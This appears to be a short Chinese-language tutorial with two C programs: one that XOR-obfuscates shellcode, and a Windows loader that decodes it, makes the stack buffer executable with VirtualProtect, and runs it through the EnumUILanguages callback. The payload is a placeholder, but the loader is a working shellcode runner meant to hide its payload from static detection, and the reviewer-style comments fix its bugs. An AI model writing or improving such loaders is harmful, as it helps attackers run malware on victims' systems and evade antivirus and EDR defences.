• 异或加密生成加密后的shellcode（注意：这里是固定单字节异或再加 1 的可逆混淆，并非真正的加密——密钥固定，已知任意一个明文字节即可还原）

    #include "stdio.h"
    #include <iostream>
    #include "windows.h"
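    /* Single-byte XOR key. The original source wrote 1022 (0x3FE); assigning
     * the XOR result back into an unsigned char keeps only the low byte, so
     * the effective key is 0xFE. Spelled out here so the truncation is visible
     * and the loader can use the identical constant. */
    enum { XOR_KEY = 0xFE };

    /* Encodes len bytes of buf in place: each byte is XORed with XOR_KEY and
     * then incremented (wrapping mod 256). The decoder must undo the steps in
     * reverse order (decrement, then XOR). This is obfuscation, not
     * encryption: the key is fixed and recoverable from any known byte. */
    static void encode_bytes(unsigned char *buf, size_t len)
    {
        for (size_t i = 0; i < len; i++) {
            buf[i] = (unsigned char)(buf[i] ^ XOR_KEY);
            buf[i]++;
        }
    }

    /* Prints the encoded form of the placeholder payload as the body of a C
     * string literal ("\x..\x..") that can be pasted into the loader. */
    int main()
    {
        /* Placeholder; replace with the raw shellcode bytes. */
        unsigned char buf[] = "shellcodes";
        /* sizeof counts the string terminator, which is not part of the payload. */
        size_t len = sizeof(buf) - 1;

        encode_bytes(buf, len);
        for (size_t i = 0; i < len; i++) {
            /* %02x rather than %x: a value such as 0x05 would otherwise print
             * as "\x5", which is easy to mis-read or mis-paste. */
            printf("\\x%02x", (unsigned)buf[i]);
        }
        printf("\n");
        return 0;
    }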
• 将加密后的shellcode在运行时还原并在内存中执行，编译生成exe

    #include "stdio.h"
    #include <iostream>
    #include "windows.h"
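    /* Single-byte XOR key; must match the encoder. The original wrote 1022
     * (0x3FE), but storing the result in an unsigned char keeps only the low
     * byte, so the effective key is 0xFE. */
    enum { XOR_KEY = 0xFE };

    /* Decodes len bytes of buf in place. This is the inverse of the encoder,
     * so the steps run in reverse order: decrement first, then XOR. */
    static void decode_bytes(unsigned char *buf, size_t len)
    {
        for (size_t i = 0; i < len; i++) {
            buf[i]--;
            buf[i] = (unsigned char)(buf[i] ^ XOR_KEY);
        }
    }

    /* Decodes the embedded payload on the stack, makes that region executable,
     * and transfers control to it through the EnumUILanguages callback. */
    int main()
    {
        /* Placeholder: paste the "\x.." output of the encoder here. */
        unsigned char buf[] = "加密后的shellcode";
        size_t len = sizeof(buf) - 1;  /* drop the string terminator */

        decode_bytes(buf, len);

        /* Make the buffer executable. The original requested a hard-coded 1024
         * bytes, unrelated to the payload size; sizeof(buf) covers exactly the
         * buffer (VirtualProtect rounds the range to whole pages anyway).
         * The original also declared dw0ldPro but passed &dwOldPro, which does
         * not compile; one consistent name is used here.
         * NOTE(review): an RWX stack page plus callback-based execution is
         * commonly flagged by EDR; expect this to be detected. */
        DWORD dwOldProtect = 0;
        if (!VirtualProtect(buf, sizeof(buf), PAGE_EXECUTE_READWRITE, &dwOldProtect)) {
            /* The original ignored this result; if it fails the callback
             * below would fault on a non-executable stack (DEP). */
            fprintf(stderr, "VirtualProtect failed: %lu\n", GetLastError());
            return 1;
        }

        /* EnumUILanguages calls its callback pointer, so passing the decoded
         * buffer as the callback runs the payload without an explicit call
         * through a function pointer in this source. buf decays to the same
         * address the original's &buf produced. */
        EnumUILanguages((UILANGUAGE_ENUMPROC)buf, 0, 0);
        return 0;
    }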